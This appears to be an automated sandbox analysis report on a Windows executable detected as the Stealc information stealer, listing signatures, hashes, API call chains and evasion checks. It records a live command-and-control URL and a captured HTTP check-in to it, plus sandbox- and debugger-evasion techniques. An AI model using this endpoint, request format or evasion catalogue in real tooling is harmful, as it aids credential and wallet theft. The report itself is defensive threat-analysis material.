
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1520353
MD5: db555e4fdc380e9e8a19fcc609f7d1aa
SHA1: be66e90a5d5ce54f1a90bd59a3b4723e1a53d89c
SHA256: c1cd69890f1f81efd491b94bfff2d9e1263f4a843fc42b649aac082cf378f3a8
Tags: exeuser-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 1524 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DB555E4FDC380E9E8A19FCC609F7D1AA)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Yara matches (network capture):
Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security

Yara matches (memory dumps):
Source: 00000000.00000002.2223713103.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000003.2182199807.0000000004C60000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: Process Memory Space: file.exe PID: 1524 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: file.exe PID: 1524 | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

Yara matches (unpacked PE files):
Source: 0.2.file.exe.2a0000.0.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

No Sigma rule has matched

Suricata IDS alert:
Timestamp: 2024-09-27T08:40:14.705683+0200 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.6 | Source Port: 49711 | Destination IP: 185.215.113.37 | Destination Port: 80 | Protocol: TCP


                AV Detection

                Source: file.exe | Avira: detected
                Source: http://185.215.113.37/ | Avira URL Cloud: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpm | Avira URL Cloud: Label: malware
                Source: http://185.215.113.37/6122658-3693405117-2476756634-1003 | Avira URL Cloud: Label: malware
                Source: http://185.215.113.37/ws | Avira URL Cloud: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.php | Avira URL Cloud: Label: malware
                Source: http://185.215.113.37/3 | Avira URL Cloud: Label: malware
                Source: http://185.215.113.37 | Avira URL Cloud: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.php14 | Avira URL Cloud: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.php7 | Avira URL Cloud: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpc | Avira URL Cloud: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpw | Avira URL Cloud: Label: malware
                Source: 0.2.file.exe.2a0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
                Source: file.exe | ReversingLabs: Detection: 47%
                Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                Source: file.exe | Joe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002AC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_002AC820
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002A7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_002A7240
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002A9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_002A9AC0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002A9B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_002A9B60
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002B8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_002B8EA0
                Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002B38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_002B38B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002B4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_002B4910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002ADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_002ADA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002AE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_002AE430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002AED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_002AED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002B4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_002B4570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002ADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_002ADE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002ABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_002ABE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002B3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_002B3EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002AF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_002AF6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002A16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_002A16D0

                Networking

                Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80
                Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global traffic | HTTP traffic detected:
                    GET / HTTP/1.1
                    Host: 185.215.113.37
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIIDAFBFBKECBGDBGIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 43 39 34 30 34 33 46 36 39 30 31 39 34 32 37 37 39 37 33 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 2d 2d 0d 0a Data Ascii: ------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="hwid"66C94043F6901942779736------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="build"save------BFIIIDAFBFBKECBGDBGI--
                Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002A4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_002A4880
                Source: global traffic | HTTP traffic detected:
                    GET / HTTP/1.1
                    Host: 185.215.113.37
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIIDAFBFBKECBGDBGIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 43 39 34 30 34 33 46 36 39 30 31 39 34 32 37 37 39 37 33 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 2d 2d 0d 0a Data Ascii: ------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="hwid"66C94043F6901942779736------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="build"save------BFIIIDAFBFBKECBGDBGI--
                Source: file.exe, 00000000.00000002.2223713103.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2223713103.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2223713103.0000000000D82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/3
                Source: file.exe, 00000000.00000002.2223713103.0000000000D82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/6122658-3693405117-2476756634-1003
                Source: file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php14
                Source: file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7
                Source: file.exe, 00000000.00000002.2223713103.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpc
                Source: file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpm
                Source: file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpw
                Source: file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.2223713103.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37P

                System Summary

                Source: file.exe | Static PE information: section name:
                Source: file.exe | Static PE information: section name: .rsrc
                Source: file.exe | Static PE information: section name: .idata
                Source: file.exe | Static PE information: section name:
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 | 0_2_00672020
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0067888A | 0_2_0067888A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0066E95C | 0_2_0066E95C
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052D1C5 | 0_2_0052D1C5
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054AA5D | 0_2_0054AA5D
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00546A19 | 0_2_00546A19
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F0296 | 0_2_005F0296
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0067A2B7 | 0_2_0067A2B7
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E5B49 | 0_2_006E5B49
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0065935A | 0_2_0065935A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0067DBD1 | 0_2_0067DBD1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057F3B2 | 0_2_0057F3B2
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005FF3A5 | 0_2_005FF3A5
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007874E0 | 0_2_007874E0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006704F9 | 0_2_006704F9
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0067F4C3 | 0_2_0067F4C3
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00516553 | 0_2_00516553
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057155B | 0_2_0057155B
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005C16D6 | 0_2_005C16D6
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00676EDC | 0_2_00676EDC
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0067BEA2 | 0_2_0067BEA2
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E3696 | 0_2_005E3696
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D1F28 | 0_2_005D1F28
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00680FBD | 0_2_00680FBD
                Source: C:\Users\user\Desktop\file.exe | Code function: String function: 002A45C0 appears 316 times
                Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exe | Static PE information: Section: fbyhctql ZLIB complexity 0.9949639605462822
                Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002B9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_002B9600
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002B3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_002B3720
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\FMFPFK3X.htm
                Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: file.exe | ReversingLabs: Detection: 47%
                Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                Source: file.exe | Static file information: File size 1843200 > 1048576
                Source: file.exe | Static PE information: Raw size of fbyhctql is bigger than: 0x100000 < 0x19be00

                Data Obfuscation

                Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.2a0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fbyhctql:EW;dwaepsqc:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fbyhctql:EW;dwaepsqc:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_002B9860
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: file.exe | Static PE information: real checksum: 0x1c96b1 should be: 0x1c826e
                Source: file.exe | Static PE information: section name:
                Source: file.exe | Static PE information: section name: .rsrc
                Source: file.exe | Static PE information: section name: .idata
                Source: file.exe | Static PE information: section name:
                Source: file.exe | Static PE information: section name: fbyhctql
                Source: file.exe | Static PE information: section name: dwaepsqc
                Source: file.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002BB035 push ecx; ret | 0_2_002BB048
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0074906B push eax; mov dword ptr [esp], 05317ADBh | 0_2_0074908F
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0074906B push 7F22905Ah; mov dword ptr [esp], esi | 0_2_00749173
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006EA85F push 5D4B2445h; mov dword ptr [esp], eax | 0_2_006EA883
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006EA85F push esi; mov dword ptr [esp], eax | 0_2_006EA9AF
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push 759D9C00h; mov dword ptr [esp], edx | 0_2_00672049
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push edx; mov dword ptr [esp], edi | 0_2_00672060
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push edi; mov dword ptr [esp], ebp | 0_2_00672064
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push esi; mov dword ptr [esp], 73BE916Eh | 0_2_006720D2
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push ebp; mov dword ptr [esp], edx | 0_2_0067219B
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push 7AA7A633h; mov dword ptr [esp], esi | 0_2_006721A3
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push 48798A93h; mov dword ptr [esp], eax | 0_2_006721D7
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push 2658D12Dh; mov dword ptr [esp], edi | 0_2_006721E4
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push edi; mov dword ptr [esp], eax | 0_2_006721FD
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push edi; mov dword ptr [esp], ebx | 0_2_00672286
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push ebp; mov dword ptr [esp], ebx | 0_2_00672298
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push esi; mov dword ptr [esp], ebp | 0_2_006722D3
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push 1B5F58F1h; mov dword ptr [esp], ebp | 0_2_00672301
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push 7FE14CEFh; mov dword ptr [esp], edi | 0_2_0067236D
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push 15D976C1h; mov dword ptr [esp], ebp | 0_2_00672408
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push ebp; mov dword ptr [esp], ebx | 0_2_00672523
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push ebp; mov dword ptr [esp], 3F9F51ACh | 0_2_006725C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push eax; mov dword ptr [esp], 6ED953EDh | 0_2_0067262F
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push eax; mov dword ptr [esp], edi | 0_2_00672646
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push eax; mov dword ptr [esp], 5307BF52h | 0_2_006726D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push ecx; mov dword ptr [esp], edx | 0_2_00672781
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push esi; mov dword ptr [esp], edi | 0_2_006728A1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push 7E58CDDEh; mov dword ptr [esp], edi | 0_2_006728CE
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push eax; mov dword ptr [esp], esi | 0_2_00672956
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push ecx; mov dword ptr [esp], 72FAA9B9h | 0_2_0067296B
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672020 push esi; mov dword ptr [esp], 6DEFA45Bh | 0_2_00672A29
                Source: file.exe | Static PE information: section name: fbyhctql entropy: 7.95281216056825

                Boot Survival

                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_002B9860

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13664
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 684A4A second address: 684A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 684A4F second address: 684A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FBF78E7B356h 0x0000000a jmp 00007FBF78E7B361h 0x0000000f jnl 00007FBF78E7B356h 0x00000015 popad 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 684BD0 second address: 684BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 684D14 second address: 684D19 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 684D19 second address: 684D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
